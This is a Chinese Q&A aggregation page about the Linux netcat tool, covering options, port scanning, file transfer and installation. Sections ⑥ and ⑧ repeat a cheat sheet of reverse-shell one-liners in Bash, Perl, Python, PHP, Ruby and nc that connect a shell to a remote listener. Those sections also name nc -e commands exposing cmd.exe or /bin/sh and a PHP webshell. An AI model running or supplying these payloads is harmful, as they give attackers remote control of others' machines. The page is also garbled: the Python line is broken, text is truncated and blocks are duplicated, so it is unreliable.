netcatlinux
① linux 什麼命令號稱黑客的瑞士軍刀
Linux上面的nc命令號稱是黑客的瑞士軍刀,nc命令是安裝了netcat這個軟體後才有的命令。
② Linux nc命令詳解 Linux nc命令怎麼用
Linux中nc命令是一個功能強大的網路工具,全稱是netcat。
語法:
nc [-hlnruz][-g<網關...>][-G<指向器數目>][-i<延遲秒數>][-o<輸出文件>][-p<通信埠>][-s<來源位址>][-v...][-w<超時秒數>][主機名稱][通信埠...]
參數說明:
-g<網關> 設置路由器躍程通信網關,最丟哦可設置8個。
-G<指向器數目> 設置來源路由指向器,其數值為4的倍數。
-h 在線幫助。
-i<延遲秒數> 設置時間間隔,以便傳送信息及掃描通信埠。
-l 使用監聽模式,管控傳入的資料。
-n 直接使用IP地址,而不通過域名伺服器。
-o<輸出文件> 指定文件名稱,把往來傳輸的數據以16進制字碼傾倒成該文件保存。
-p<通信埠> 設置本地主機使用的通信埠。
-r 亂數指定本地與遠端主機的通信埠。
-s<來源位址> 設置本地主機送出數據包的IP地址。
-u 使用UDP傳輸協議。
-v 顯示指令執行過程。
-w<超時秒數> 設置等待連線的時間。
-z 使用0輸入/輸出模式,只在掃描通信埠時使用。
實例:
1、TCP埠掃描
# nc -v -z -w2 127.0.0.1 1-100
Connection to 127.0.0.1 22 port [tcp/ssh] succeeded!
Connection to 127.0.0.1 53 port [tcp/domain] succeeded!
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
...
nc: connect to 127.0.0.1 port 100 (tcp) failed: Connection refused
2、從192.168.1.2拷貝文件到192.168.1.3
首先在接收端192.168.1.3上: nc -l 1234 > test.txt
然後在發送端192.168.1.2上: nc 192.168.1.3 < test.txt
注意:先運行接收端,指定一個埠為1234,文件為test.txt,再執行發送端,並且發送端必須存在同名的文件test.txt
3、傳輸目錄
從server1(192.168.16.233)拷貝nginx目錄內容到server2(192.168.48.47)上。需要先在server2上,用nc激活監聽,
server2上運行:# nc -l 1234 | tar xzv-
server1上運行:# tar czv- nginx | nc 192.168.48.47 1234
4、簡單聊天工具
在192.168.1.2上: nc -l 1234
在192.168.1.3上: nc 192.168.1.2 1234
這樣,雙方就可以相互交流了。使用ctrl+C(或D)退出
③ 什麼是Linux系統中nc命令
Linux中nc命令是一個功能強大的網路工具,全稱是netcat。
測試使用
在一個終端上 輸入 nc -lk 9999
輸入數據。。。
新開啟一個終端
輸入 nc ip:9999
就可以看到上一個終端輸入的數據
④ 求教高手,編寫一個linux下埠掃描程序
這里介紹netcat命令檢查開放埠
netcat(或nc)是一種命令行工具,可以使用TCP或UDP協議跨網路連接讀取和寫入數據。使用netcat可以掃描單個埠或者埠范圍。
比如,要掃描IP地址192.168.8.51在范圍內遠程計算機上打開的TCP埠,4000-4004可以進行以下命令:nc -z -v 192.168.8.51 4000-4004
1-z選項指示nc僅掃描打開的埠,並不發送任何數據,並且-v用於獲取更多詳細信息。運行結果如下:
sl@Li:~/Works/brochain/corsac$ nc -z -v 192.168.8.51 4000-4004
Connection to 192.168.8.51 4000 port [tcp/*] succeeded!
nc: connect to 192.168.8.51 port 4001 (tcp) failed: Connection refused
nc: connect to 192.168.8.51 port 4002 (tcp) failed: Connection refused
nc: connect to 192.168.8.51 port 4003 (tcp) failed: Connection refused
nc: connect to 192.168.8.51 port 4004 (tcp) failed: Connection refused
⑤ netcat/nc 在linux為什麼不能用
你需要安裝nc 確定你的DNS可以解析公網地址(命令:vi /etc/resolv.conf,添加:nameserver 222.172.200.68) 使用命令:yum install nc 安裝完成再使用命令:nc -l 5001
⑥ netcat linux 什麼系統版本默認安裝了
etcat-0.7.1.tar.gz
然後當然是解壓了
tar zxvf netcat-0.7.1.tar.gz
解壓完畢之後會生成目錄,要cd進去
cd netcat-0.7.1
然後進行編譯前的配置。
./configure
配置完了之後就可以make編譯了。
編譯成功就生成了netcat可執行的文件了,位於src目錄,cd進去進行運行./netcat -h.如圖
本地Windows監聽
nc -vv -l -p 1234
遠程Windows轉發
nc -t -e C:\WINDOWS\system32\cmd.exe 8.8.8.8 1234
遠程Linux轉發
./netcat 8.8.8.8 1234 -e /bin/sh
ReverseShell.c
ReverseShell.pl
ReverseShell.py
phpspy.php
———————NetCat for linux 參數e————————-
下載netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
cd src
./netcat -h
——————————————————————–
一句話反彈命令
[Bash]
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
[PERL]
perl -e 『use Socket;$i=」10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(「tcp」));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,」>&S」);open(STDOUT,」>&S」);open(STDERR,」>&S」);exec(「/bin/sh -i」);};』
[python]
python -c 『import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((「10.0.0.1″,1234));os.p2(s.fileno(),0); os.p2(s.fileno(),1); os.p2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);』
[PHP]
php -r 『$sock=fsockopen(「10.0.0.1″,1234);exec(「/bin/sh -i <&3 >&3 2>&3″);』
[Ruby]
ruby -rsocket -e』f=TCPSocket.open(「10.0.0.1″,1234).to_i;exec sprintf(「/bin/sh -i <&%d >&%d 2>&%d」,f,f,f)』
[Netcat]
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
⑦ linux下復制一個大於1T的文件夾命令是什麼
用netcat通過socket把流傳送出去就可以搞定了。
需要發送文件的機器: netcat -l -p 8888 < 1T.file
收的機器:netcat x.x.x.x 8888 > 1T.file
⑧ linux怎麼安裝netcat
etcat-0.7.1.tar.gz
然後當然是解壓了
tar zxvf netcat-0.7.1.tar.gz
解壓完畢之後會生成目錄,要cd進去
cd netcat-0.7.1
然後進行編譯前的配置。
./configure
配置完了之後就可以make編譯了。
編譯成功就生成了netcat可執行的文件了,位於src目錄,cd進去進行運行./netcat -h.如圖
本地Windows監聽
nc -vv -l -p 1234
遠程Windows轉發
nc -t -e C:\WINDOWS\system32\cmd.exe 8.8.8.8 1234
遠程Linux轉發
./netcat 8.8.8.8 1234 -e /bin/sh
ReverseShell.c
ReverseShell.pl
ReverseShell.py
phpspy.php
———————NetCat for linux 參數e————————-
下載netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
cd src
./netcat -h
——————————————————————–
一句話反彈命令
[Bash]
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
[PERL]
perl -e 『use Socket;$i=」10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(「tcp」));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,」>&S」);open(STDOUT,」>&S」);open(STDERR,」>&S」);exec(「/bin/sh -i」);};』
[Python]
python -c 『import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((「10.0.0.1″,1234));os.p2(s.fileno(),0); os.p2(s.fileno(),1); os.p2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);』
[PHP]
php -r 『$sock=fsockopen(「10.0.0.1″,1234);exec(「/bin/sh -i <&3 >&3 2>&3″);』
[Ruby]
ruby -rsocket -e』f=TCPSocket.open(「10.0.0.1″,1234).to_i;exec sprintf(「/bin/sh -i <&%d >&%d 2>&%d」,f,f,f)』
[Netcat]
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f